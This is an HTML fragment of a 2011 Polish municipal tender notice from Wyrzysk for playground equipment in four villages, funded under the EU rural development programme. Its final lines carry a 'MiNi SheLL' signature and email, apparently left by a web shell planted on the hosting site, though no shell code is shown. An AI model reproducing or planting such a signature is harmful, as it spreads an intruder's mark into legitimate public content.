<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wyrzysk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wyrzysku, ul. Bydgoska 29, 89-300 Wyrzysk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2011 godzina 10:00, miejsce: Urząd Miejski w Wyrzysku, ul. Bydgoska 29, 89-300 Wyrzysk
pok. nr 16 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Programów Wiejskich na lata 2007-2013, działanie 413 Wdrażanie lokalnych strategii rozwoju dla małych projektów, tj. operacji, które nie odpowiadają warunkom przyznania pomocy w ramach działań Osi 3 ale przyczyniają się do osiągnięcia celów tej osi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 pn. Plac zabaw w miejscowości Falmierowo:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) zestaw do zabaw - 1 szt.,
f) regulamin placu - 1 szt,
g) ławka parkowa - 4 szt.,
h) kosz na śmieci - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 pn. Plac zabaw w miejscowości Gromadno:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) zestaw do zabaw - 1 szt.,
f) regulamin placu - 1 szt,
g) ławka parkowa - 4 szt.,
h) kosz na śmieci - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 pn. Plac zabaw w miejscowości Auguścin:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) zestaw do zabaw - 1 szt.,
f) regulamin placu - 1 szt,
g) ławka parkowa - 4 szt.,
h) kosz na śmieci - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 pn. Plac zabaw w miejscowości Dobrzyniewo:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) regulamin placu - 1 szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com